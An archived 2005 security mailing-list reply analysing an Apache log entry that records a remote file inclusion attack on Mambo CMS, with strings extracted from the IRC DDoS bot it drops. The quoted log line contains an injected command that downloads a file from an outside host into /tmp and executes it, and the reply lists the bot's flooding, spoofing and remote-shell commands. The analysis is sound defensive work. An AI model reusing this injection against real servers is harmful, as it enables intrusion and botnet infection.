[Dshield] Can Someone Decipher This Log Entry?
security at admin.fulgan.com
Thu Dec 22 10:30:34 GMT 2005
I've masked part of the IP you provided in your message, just in case
in case. It's a bit silly considering you didn't do the same, but,
well, it does no additional harm...
it looks like that this is an attempt to exploit a flaw in the Mambo
content management software (looks like it's this one:
If the exploit succeeds, it will try to wget a file called "micu" from
XXX.136.48.69 into the /tmp folder and execute it.
At this moment, that server is still serving the file so I checked it.
What it does is try to download and execute two more files: "mare" and "ro"
"mare" isn't available on the remote server but "ro" is. it looks like
an ELF executable. Now, I'm not a specialist of that file format so
I may be completely wrong here but this looks like a Linux x86
executable file. It seems to link the /lib/ld-linux.so.2 library and
import a bunch of functions that you expect from a IP server program.
It also contains a number of strings that indicates that it might try
to contact an IRC server (*.undernet.org). It also has a nice internal
help that is probably intended to be used by the attacker:
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = Sends this command to the server
NOTICE %s :SH <command> = Executes a command
NOTICE %s :Killing pid %d.
So what this looks like is a client for a DDoS botnet.
Other entries in the program seems to indicate it's been compiled on a
There is also something that looks very much like an HTTP request:
GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
It would be interesting to see if the request matches your log entry:
I think the above request is part of the exploit code.
I did a bit of google research and found several DDoS client that are
apparently based on the same code that contains the same string
That's all I can say about this... The attacker is still up and
running and probably still scanning networks trying to drop it's
Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
DCH> I cannot make sense of this Apache print:
DCH> 188.8.131.52 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 200 21 "-"
Stephane mailto:security at admin.fulgan.com
More information about the list